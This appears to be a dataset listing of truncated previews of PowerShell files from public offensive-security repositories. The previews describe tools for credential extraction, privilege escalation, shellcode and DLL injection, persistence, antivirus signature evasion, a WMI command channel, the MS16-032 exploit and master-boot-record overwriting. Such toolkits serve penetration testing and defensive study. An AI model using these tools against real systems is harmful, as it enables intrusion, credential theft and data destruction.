github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Find-PS-WMI/Find-PSRemotingLocalAdminAccess.ps1 | PowerShell | mit | 2,733 | master | 2,805 | function Find-PSRemotingLocalAdminAccess
{
<#
.SYNOPSIS
Use this script to search for local admin access on machines in a domain or local network.
.DESCRIPTION
This function simply runs a PowerShell Remoting command against the sepcified list of computers. Since, by-default,
we need local administrative access on a... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Find-PS-WMI/Find-WMILocalAdminAccess.ps1 | PowerShell | mit | 2,733 | master | 2,768 | function Find-WMILocalAdminAccess
{
<#
.SYNOPSIS
Use this script tp search for local admin access on machines in a domain or local network.
.DESCRIPTION
This function simply runs a WMI command against the sepcified list of computers. Since, by-default,
we need local administrative access on a computer to run WMI co... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Invoke-ACLPwn/Invoke-ACLPwn.ps1 | PowerShell | mit | 2,733 | master | 64,384 | ### Written by Rindert Kramer
####################
#
# Copyright (c) 2018 Fox-IT
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the right... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/SessionGopher/SessionGopher.ps1 | PowerShell | mit | 2,733 | master | 39,492 | <#
.SYNPOSIS
Extracts and decrypts saved session information for software typically used to access Unix systems.
.DESCRIPTION
Queries HKEY_USERS for PuTTY, WinSCP, and Remote Desktop saved sessions. Decrypts saved passwords for WinSCP.
Extracts FileZilla, SuperPuTTY's saved session information in the siteman... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Dev/PowerSploit.psd1 | PowerShell | mit | 2,733 | master | 5,278 | @{
# Script module or binary module file associated with this manifest.
ModuleToProcess = 'PowerSploit.psm1'
# Version number of this module.
ModuleVersion = '3.0.0.0'
# ID used to uniquely identify this module
GUID = '6753b496-d842-40a3-924a-0f09e248640c'
# Author of this module
Author = 'Matthew Graeber'
# Copyri... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Dev/Mayhem/Mayhem.psm1 | PowerShell | mit | 2,733 | master | 13,006 | function Set-MasterBootRecord
{
<#
.SYNOPSIS
Proof of concept code that overwrites the master boot record with the
message of your choice.
PowerSploit Function: Set-MasterBootRecord
Author: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec)
License: BSD 3-Clause
Required Dependencies: None
Opt... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Dev/Exfiltration/Get-GPPPassword.ps1 | PowerShell | mit | 2,733 | master | 13,672 | function Get-GPPPassword {
<#
.SYNOPSIS
Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
PowerSploit Function: Get-GPPPassword
Author: Chris Campbell (@obscuresec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESC... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Dev/Exfiltration/Get-VaultCredential.ps1 | PowerShell | mit | 2,733 | master | 20,326 | function Get-VaultCredential
{
<#
.SYNOPSIS
Displays Windows vault credential objects including cleartext web credentials.
PowerSploit Function: Get-VaultCredential
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Get-VaultCredenti... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Dev/Persistence/Persistence.psm1 | PowerShell | mit | 2,733 | master | 39,078 | function New-ElevatedPersistenceOption
{
<#
.SYNOPSIS
Configure elevated persistence options for the Add-Persistence function.
PowerSploit Function: New-ElevatedPersistenceOption
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIP... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Dev/AntivirusBypass/Find-AVSignature.ps1 | PowerShell | mit | 2,733 | master | 6,748 | function Find-AVSignature
{
<#
.SYNOPSIS
Locate tiny AV signatures.
PowerSploit Function: Find-AVSignature
Authors: Chris Campbell (@obscuresec) & Matt Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Locates single Byte AV signatures uti... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Dev/Privesc/Get-System.ps1 | PowerShell | mit | 2,733 | master | 26,768 | function Get-System {
<#
.SYNOPSIS
GetSystem functionality inspired by Meterpreter's getsystem.
Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: PSReflect
.DESCRIPTION
Executes "getsystem" functionality similar to Meterpreter.
'NamedPipe' impers... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Dev/Privesc/Privesc.psd1 | PowerShell | mit | 2,733 | master | 1,659 | @{
# Script module or binary module file associated with this manifest.
ModuleToProcess = 'Privesc.psm1'
# Version number of this module.
ModuleVersion = '3.0.0.0'
# ID used to uniquely identify this module
GUID = 'efb2a78f-a069-4bfd-91c2-7c7c0c225f56'
# Author of this module
Author = 'Will Schroeder (@harmj0y)'
#... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Dev/ScriptModification/Out-CompressedDll.ps1 | PowerShell | mit | 2,733 | master | 2,486 | function Out-CompressedDll
{
<#
.SYNOPSIS
Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory.
PowerSploit Function: Out-CompressedDll
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Ou... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Dev/ScriptModification/ScriptModification.psd1 | PowerShell | mit | 2,733 | master | 951 | @{
# Script module or binary module file associated with this manifest.
ModuleToProcess = 'ScriptModification.psm1'
# Version number of this module.
ModuleVersion = '3.0.0.0'
# ID used to uniquely identify this module
GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610'
# Author of this module
Author = 'Matthew Graeber'
... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Dev/ScriptModification/Out-EncryptedScript.ps1 | PowerShell | mit | 2,733 | master | 5,159 | function Out-EncryptedScript
{
<#
.SYNOPSIS
Encrypts text files/scripts.
PowerSploit Function: Out-EncryptedScript
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Out-EncryptedScript will encrypt a script (or any text fil... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Dev/ScriptModification/Remove-Comment.ps1 | PowerShell | mit | 2,733 | master | 5,159 | function Remove-Comment
{
<#
.SYNOPSIS
Strips comments and extra whitespace from a script.
PowerSploit Function: Remove-Comment
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Remove-Comment strips out comments and unnece... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Dev/ScriptModification/Out-EncodedCommand.ps1 | PowerShell | mit | 2,733 | master | 7,792 | function Out-EncodedCommand
{
<#
.SYNOPSIS
Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script.
PowerSploit Function: Out-EncodedCommand
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRI... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Dev/Tests/Privesc.tests.ps1 | PowerShell | mit | 2,733 | master | 55,867 | Set-StrictMode -Version Latest
$TestScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent
$ModuleRoot = Resolve-Path "$TestScriptRoot\.."
$ModuleManifest = "$ModuleRoot\Privesc\Privesc.psd1"
Remove-Module [P]rivesc
Import-Module $ModuleManifest -Force -ErrorAction Stop
# import PowerUp.ps1 manually so we expo... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Dev/Recon/Recon.psd1 | PowerShell | mit | 2,733 | master | 3,146 | @{
# Script module or binary module file associated with this manifest.
ModuleToProcess = 'Recon.psm1'
# Version number of this module.
ModuleVersion = '3.0.0.0'
# ID used to uniquely identify this module
GUID = '7e775ad6-cd3d-4a93-b788-da067274c877'
# Author of this module
Author = 'Matthew Graeber', 'Will Schroed... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Dev/Recon/Invoke-CompareAttributesForClass.ps1 | PowerShell | mit | 2,733 | master | 32,639 | function Get-AllAttributesForClass
{<#
.Synopsis
Gets all AD Schema attributes for class
.DESCRIPTION
This function will get all attributes for a class from AD.
.EXAMPLE
PS C:\> Get-AllAttributesForAClass -class user
.EXAMPLE
PS C:\> Get-AllAttributesForAClass -class computer
#>
[CmdletBinding()]
P... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Dev/Recon/Get-HttpStatus.ps1 | PowerShell | mit | 2,733 | master | 3,592 | function Get-HttpStatus
{
<#
.SYNOPSIS
Returns the HTTP Status Codes and full URL for specified paths.
PowerSploit Function: Get-HttpStatus
Author: Chris Campbell (@obscuresec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
A script to check for the existence of... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Dev/Recon/Invoke-ReverseDnsLookup.ps1 | PowerShell | mit | 2,733 | master | 8,085 | function Invoke-ReverseDnsLookup
{
<#
.SYNOPSIS
Perform a reverse DNS lookup scan on a range of IP addresses.
PowerSploit Function: Invoke-ReverseDnsLookup
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Invoke-ReverseDns... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Dev/Recon/Get-ComputerDetail.ps1 | PowerShell | mit | 2,733 | master | 17,708 | function Get-ComputerDetail
{
<#
.SYNOPSIS
This script is used to get useful information from a computer.
Function: Get-ComputerDetail
Author: Joe Bialek, Twitter: @JosephBialek
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
This script is used to get useful information from a computer... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Dev/Recon/Invoke-Portscan.ps1 | PowerShell | mit | 2,733 | master | 44,677 | function Invoke-Portscan
{
<#
.SYNOPSIS
Simple portscan module
PowerSploit Function: Invoke-Portscan
Author: Rich Lundeen (http://webstersProdigy.net)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Does a simple port scan using regular sockets, based (pretty) lo... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Dev/CodeExecution/Invoke-WmiCommand.ps1 | PowerShell | mit | 2,733 | master | 14,743 | function Invoke-WmiCommand {
<#
.SYNOPSIS
Executes a PowerShell ScriptBlock on a target computer using WMI as a
pure C2 channel.
Author: Matthew Graeber
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Invoke-WmiCommand executes a PowerShell ScriptBlock on a target
... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Dev/CodeExecution/Invoke-Shellcode.ps1 | PowerShell | mit | 2,733 | master | 23,807 | function Invoke-Shellcode
{
<#
.SYNOPSIS
Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process.
PowerSploit Function: Invoke-Shellcode
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Dev/CodeExecution/Invoke-ReflectivePEInjection.ps1 | PowerShell | mit | 2,733 | master | 151,863 | function Invoke-ReflectivePEInjection
{
<#
.SYNOPSIS
This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process,
or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints,
please lead the Notes section (GENERAL NOTES) for information... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerSploit-Dev/CodeExecution/Invoke-DllInjection.ps1 | PowerShell | mit | 2,733 | master | 13,053 | function Invoke-DllInjection
{
<#
.SYNOPSIS
Injects a Dll into the process ID of your choosing.
PowerSploit Function: Invoke-DllInjection
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Invoke-DllInjection injects a Dll i... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Kerberoast/GetUserSPNs.ps1 | PowerShell | mit | 2,733 | master | 4,910 | # Edits by Tim Medin
# File: GetUserSPNS.ps1
# Contents: Query the domain to find SPNs that use User accounts
# Comments: This is for use with Kerberoast https://github.com/nidem/kerberoast
# The password hash used with Computer accounts are infeasible to
# crack; however, if the User account a... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Powercat/powercat.ps1 | PowerShell | mit | 2,733 | master | 37,641 | function powercat
{
param(
[alias("Client")][string]$c="",
[alias("Listen")][switch]$l=$False,
[alias("Port")][Parameter(Position=-1)][string]$p="",
[alias("Execute")][string]$e="",
[alias("ExecutePowershell")][switch]$ep=$False,
[alias("Relay")][string]$r="",
[alias("UDP")][switch]$u=$Fal... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Privesc-master/privesc.ps1 | PowerShell | mit | 2,733 | master | 77,006 | function Invoke-Privesc {
<#
.SYNOPSIS
Author: Jakub Palaczynski
IncludeInList
.DESCRIPTION
Find misconfigurations that may allow for privilege escalation.
.PARAMETER Groups
Groups of our interest when checking ACLs.
.PARAMETER Mode
Mode to use - full or lhf (default).
.PARAMETER Extended
Switch enables lookups that m... |
github | FuzzySecurity/PowerShell-Suite | https://github.com/FuzzySecurity/PowerShell-Suite | Get-TokenPrivs.ps1 | PowerShell | bsd-3-clause | 2,715 | master | 6,545 | function Get-TokenPrivs {
<#
.SYNOPSIS
Open a handle to a process and use Advapi32::GetTokenInformation
to list the privileges associated with the process token.
Notes:
* You can only get token privileges for a process you own or
belonging to a lower privilege user account. In general, regular
users can onl... |
github | FuzzySecurity/PowerShell-Suite | https://github.com/FuzzySecurity/PowerShell-Suite | Invoke-Runas.ps1 | PowerShell | bsd-3-clause | 2,715 | master | 4,888 | function Invoke-Runas {
<#
.SYNOPSIS
Overview:
Functionally equivalent to Windows "runas.exe", using Advapi32::CreateProcessWithLogonW (also used
by runas under the hood).
Parameters:
-User Specifiy username.
-Password Specify password.
-Domain ... |
github | FuzzySecurity/PowerShell-Suite | https://github.com/FuzzySecurity/PowerShell-Suite | Get-LimitChildItem.ps1 | PowerShell | bsd-3-clause | 2,715 | master | 1,200 | function Get-LimitChildItem {
<#
.SYNOPSIS
Depth limited wrapper for Get-ChildItem with basic filter functionality.
.DESCRIPTION
Author: Ruben Boonen (@FuzzySec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.PARAMETER Path
Top level path (local or UNC).
.PARAMETER MaxDepth
Fol... |
github | FuzzySecurity/PowerShell-Suite | https://github.com/FuzzySecurity/PowerShell-Suite | Get-OSTokenInformation.ps1 | PowerShell | bsd-3-clause | 2,715 | master | 28,660 | function Get-OSTokenInformation {
<#
.SYNOPSIS
Get-OSTokenInformation uses a variety of API's to pull in all (accessible) user tokens and queries them for details.
Notes:
- This is not a perfect process as you may not be able to access all processes/threads and they may disappear
between the time the script iden... |
github | FuzzySecurity/PowerShell-Suite | https://github.com/FuzzySecurity/PowerShell-Suite | Subvert-PE.ps1 | PowerShell | bsd-3-clause | 2,715 | master | 7,235 | function Subvert-PE {
<#
.SYNOPSIS
Inject shellcode into a PE image while retaining the PE functionality.
Author: Ruben Boonen (@FuzzySec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Parse a PE image, inject shellcode at the end of the code sec... |
github | FuzzySecurity/PowerShell-Suite | https://github.com/FuzzySecurity/PowerShell-Suite | Invoke-MS16-032.ps1 | PowerShell | bsd-3-clause | 2,715 | master | 11,460 | function Invoke-MS16-032 {
<#
.SYNOPSIS
PowerShell implementation of MS16-032. The exploit targets all vulnerable
operating systems that support PowerShell v2+. Credit for the discovery of
the bug and the logic to exploit it go to James Forshaw (@tiraniddo).
Targets:
* Win7-Win10 & 2k... |
github | FuzzySecurity/PowerShell-Suite | https://github.com/FuzzySecurity/PowerShell-Suite | Trace-Execution.ps1 | PowerShell | bsd-3-clause | 2,715 | master | 13,280 | function Trace-Execution {
<#
.SYNOPSIS
Uses the Capstone engine to recursively disassemble a PE (x32/x64) from
it's entry point, effectively "following" execution flow. The following
rules are observed:
- jmp's are taken if they fall in the PE address space
- call's are taken if they fall in the PE address spac... |
github | FuzzySecurity/PowerShell-Suite | https://github.com/FuzzySecurity/PowerShell-Suite | Get-ProcessMiniDump.ps1 | PowerShell | bsd-3-clause | 2,715 | master | 2,810 | function Get-ProcessMiniDump {
<#
.SYNOPSIS
Create process dump using Dbghelp::MiniDumpWriteDump.
.DESCRIPTION
Author: Ruben Boonen (@FuzzySec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.PARAMETER ProcID
PID for the target process.
.PARAMETER Path
Dump outfile path.
.EXAMP... |
github | FuzzySecurity/PowerShell-Suite | https://github.com/FuzzySecurity/PowerShell-Suite | Get-SystemModuleInformation.ps1 | PowerShell | bsd-3-clause | 2,715 | master | 3,648 | function Get-SystemModuleInformation {
<#
.SYNOPSIS
Use NtQuerySystemInformation::SystemModuleInformation to get a list of
loaded modules, their base address and size (x32/x64).
.DESCRIPTION
Author: Ruben Boonen (@FuzzySec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.EXAMPLE
... |
github | FuzzySecurity/PowerShell-Suite | https://github.com/FuzzySecurity/PowerShell-Suite | Get-SystemProcessInformation.ps1 | PowerShell | bsd-3-clause | 2,715 | master | 9,108 | function Get-SystemProcessInformation {
<#
.SYNOPSIS
Use NtQuerySystemInformation::SystemProcessInformation to get a detailed
list of processes and process properties. On close inspection you will
find that many process monitors such as Sysinternals Process Explorer or
Process Hacker use this information class (in ... |
github | FuzzySecurity/PowerShell-Suite | https://github.com/FuzzySecurity/PowerShell-Suite | Expose-NetAPI.ps1 | PowerShell | bsd-3-clause | 2,715 | master | 7,402 | function Expose-NetAPI {
<#
.SYNOPSIS
Expose-NetAPI uses reflection to import .NET API classes into PowerShell.
This includes internal private classes, such as
Microsoft.Win32.UnsafeNativeMethods.
The "Search" parameter provides a way to search loaded assemblies for
partial matches on API names. Specifying the "... |
github | FuzzySecurity/PowerShell-Suite | https://github.com/FuzzySecurity/PowerShell-Suite | Check-VTFile.ps1 | PowerShell | bsd-3-clause | 2,715 | master | 3,149 | function Check-VTFile {
<#
.SYNOPSIS
Submit SHA256 hash of a file to Virus Total and retrieve the scan report if the hash is known.
.PARAMETER Path
Path to file.
.DESCRIPTION
Author: Ruben Boonen (@FuzzySec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.EXAMPLE
... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.